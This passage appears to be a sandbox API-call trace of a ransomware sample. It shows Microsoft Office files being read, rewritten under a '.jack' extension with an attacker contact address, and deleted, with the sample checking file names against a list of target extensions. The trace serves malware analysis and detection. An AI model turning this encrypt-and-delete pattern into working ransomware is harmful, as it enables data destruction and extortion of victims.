nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.330] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13e, lpOverlapped=0x0) returned 1 [0207.330] SetEndOfFile (hFile=0x438) returned 1 [0207.330] CloseHandle (hObject=0x438) returned 1 [0207.331] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.331] SetEndOfFile (hFile=0x40c) returned 1 [0207.332] CloseHandle (hObject=0x40c) returned 1 [0207.332] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.332] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0117-0409-1000-0000000ff1ce.xml")) returned 1 [0207.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.333] lstrlenW (lpString=".doc") returned 4 [0207.333] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.333] lstrlenW (lpString=".docx") returned 5 [0207.333] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.333] lstrlenW (lpString=".pdf") returned 4 [0207.333] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.333] lstrlenW (lpString=".xls") returned 4 [0207.333] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.333] lstrlenW (lpString=".xlsx") returned 5 [0207.333] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.333] lstrlenW (lpString=".ppt") returned 4 [0207.333] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.333] lstrlenW (lpString=".zip") returned 4 [0207.333] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.333] lstrlenW (lpString=".rar") returned 4 [0207.333] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.333] lstrlenW (lpString=".bz2") returned 4 [0207.333] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.333] lstrlenW (lpString=".7z") returned 3 [0207.333] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.333] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.334] lstrlenW (lpString=".dbf") returned 4 [0207.334] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.334] lstrlenW (lpString=".1cd") returned 4 [0207.334] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.334] lstrlenW (lpString=".jpg") returned 4 [0207.334] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.334] lstrlenW (lpString=".doc") returned 4 [0207.334] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.334] lstrlenW (lpString=".docx") returned 5 [0207.334] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0207.334] lstrlenW (lpString=".pdf") returned 4 [0207.334] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.334] lstrlenW (lpString=".xls") returned 4 [0207.334] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.334] lstrlenW (lpString=".xlsx") returned 5 [0207.334] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0207.334] lstrlenW (lpString=".ppt") returned 4 [0207.334] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.334] lstrlenW (lpString=".zip") returned 4 [0207.334] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.334] lstrlenW (lpString=".rar") returned 4 [0207.334] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.334] lstrlenW (lpString=".bz2") returned 4 [0207.334] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.335] lstrlenW (lpString=".7z") returned 3 [0207.335] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.335] lstrlenW (lpString=".dbf") returned 4 [0207.335] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.335] lstrlenW (lpString=".1cd") returned 4 [0207.335] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xml") returned 104 [0207.335] lstrlenW (lpString=".jpg") returned 4 [0207.335] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.335] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0207.335] lstrlenW (lpString="AuthoredExtensions.xml") returned 22 [0207.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0207.335] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=373) returned 1 [0207.336] CloseHandle (hObject=0x40c) returned 1 [0207.336] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml")) returned 0x220 [0207.336] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0207.336] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.336] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0207.337] GetLastError () returned 0x0 [0207.337] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x175, lpOverlapped=0x0) returned 1 [0207.338] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x180, lpOverlapped=0x0) returned 1 [0207.339] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.339] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x100, lpOverlapped=0x0) returned 1 [0207.497] SetEndOfFile (hFile=0x438) returned 1 [0207.497] CloseHandle (hObject=0x438) returned 1 [0207.501] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.501] SetEndOfFile (hFile=0x40c) returned 1 [0207.502] CloseHandle (hObject=0x40c) returned 1 [0207.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.502] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\authoredextensions.xml")) returned 1 [0207.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.502] lstrlenW (lpString=".doc") returned 4 [0207.503] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.503] lstrlenW (lpString=".docx") returned 5 [0207.503] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0207.503] lstrlenW (lpString=".pdf") returned 4 [0207.503] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.503] lstrlenW (lpString=".xls") returned 4 [0207.503] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.503] lstrlenW (lpString=".xlsx") returned 5 [0207.503] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0207.503] lstrlenW (lpString=".ppt") returned 4 [0207.503] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.503] lstrlenW (lpString=".zip") returned 4 [0207.503] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.503] lstrlenW (lpString=".rar") returned 4 [0207.503] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.503] lstrlenW (lpString=".bz2") returned 4 [0207.503] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.503] lstrlenW (lpString=".7z") returned 3 [0207.503] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.503] lstrlenW (lpString=".dbf") returned 4 [0207.503] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.503] lstrlenW (lpString=".1cd") returned 4 [0207.503] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.503] lstrlenW (lpString=".jpg") returned 4 [0207.503] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.503] lstrlenW (lpString=".doc") returned 4 [0207.504] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0207.504] lstrlenW (lpString=".docx") returned 5 [0207.504] lstrcmpiW (lpString1=".docx", lpString2="s.xml") returned -1 [0207.504] lstrlenW (lpString=".pdf") returned 4 [0207.504] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0207.504] lstrlenW (lpString=".xls") returned 4 [0207.504] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0207.504] lstrlenW (lpString=".xlsx") returned 5 [0207.504] lstrcmpiW (lpString1=".xlsx", lpString2="s.xml") returned -1 [0207.504] lstrlenW (lpString=".ppt") returned 4 [0207.504] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0207.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.504] lstrlenW (lpString=".zip") returned 4 [0207.504] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0207.504] lstrlenW (lpString=".rar") returned 4 [0207.504] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0207.504] lstrlenW (lpString=".bz2") returned 4 [0207.504] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0207.504] lstrlenW (lpString=".7z") returned 3 [0207.504] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0207.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.504] lstrlenW (lpString=".dbf") returned 4 [0207.504] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0207.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.504] lstrlenW (lpString=".1cd") returned 4 [0207.504] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0207.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AuthoredExtensions.xml") returned 73 [0207.504] lstrlenW (lpString=".jpg") returned 4 [0207.504] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0207.505] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0207.505] lstrlenW (lpString="AG00037_.GIF") returned 12 [0207.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0207.506] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=6684) returned 1 [0207.506] CloseHandle (hObject=0x40c) returned 1 [0207.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif")) returned 0x220 [0207.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0207.506] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.506] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0207.506] GetLastError () returned 0x0 [0207.506] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x1a1c, lpOverlapped=0x0) returned 1 [0207.539] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x1a20, lpOverlapped=0x0) returned 1 [0207.541] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.541] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0207.541] SetEndOfFile (hFile=0x438) returned 1 [0207.541] CloseHandle (hObject=0x438) returned 1 [0207.542] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.542] SetEndOfFile (hFile=0x40c) returned 1 [0207.542] CloseHandle (hObject=0x40c) returned 1 [0207.543] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0207.543] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00037_.gif")) returned 1 [0207.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.543] lstrlenW (lpString=".doc") returned 4 [0207.543] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.543] lstrlenW (lpString=".docx") returned 5 [0207.543] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.543] lstrlenW (lpString=".pdf") returned 4 [0207.543] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.543] lstrlenW (lpString=".xls") returned 4 [0207.543] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.543] lstrlenW (lpString=".xlsx") returned 5 [0207.543] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.543] lstrlenW (lpString=".ppt") returned 4 [0207.544] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.544] lstrlenW (lpString=".zip") returned 4 [0207.544] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.544] lstrlenW (lpString=".rar") returned 4 [0207.544] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.544] lstrlenW (lpString=".bz2") returned 4 [0207.544] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.544] lstrlenW (lpString=".7z") returned 3 [0207.544] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.544] lstrlenW (lpString=".dbf") returned 4 [0207.544] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.544] lstrlenW (lpString=".1cd") returned 4 [0207.544] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.544] lstrlenW (lpString=".jpg") returned 4 [0207.544] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.544] lstrlenW (lpString=".doc") returned 4 [0207.544] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.544] lstrlenW (lpString=".docx") returned 5 [0207.544] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.544] lstrlenW (lpString=".pdf") returned 4 [0207.544] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.544] lstrlenW (lpString=".xls") returned 4 [0207.544] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.544] lstrlenW (lpString=".xlsx") returned 5 [0207.544] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.544] lstrlenW (lpString=".ppt") returned 4 [0207.544] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.545] lstrlenW (lpString=".zip") returned 4 [0207.545] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.545] lstrlenW (lpString=".rar") returned 4 [0207.545] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.545] lstrlenW (lpString=".bz2") returned 4 [0207.545] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.545] lstrlenW (lpString=".7z") returned 3 [0207.545] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.545] lstrlenW (lpString=".dbf") returned 4 [0207.545] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.545] lstrlenW (lpString=".1cd") returned 4 [0207.545] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 68 [0207.545] lstrlenW (lpString=".jpg") returned 4 [0207.545] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.545] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0207.545] lstrlenW (lpString="AG00038_.GIF") returned 12 [0207.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0207.545] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=3251) returned 1 [0207.545] CloseHandle (hObject=0x40c) returned 1 [0207.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif")) returned 0x220 [0207.546] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0207.546] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.546] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0207.546] GetLastError () returned 0x0 [0207.546] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xcb3, lpOverlapped=0x0) returned 1 [0207.729] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xcc0, lpOverlapped=0x0) returned 1 [0207.730] ReadFile (in: hFile=0x40c, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0207.730] WriteFile (in: hFile=0x438, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0207.730] SetEndOfFile (hFile=0x438) returned 1 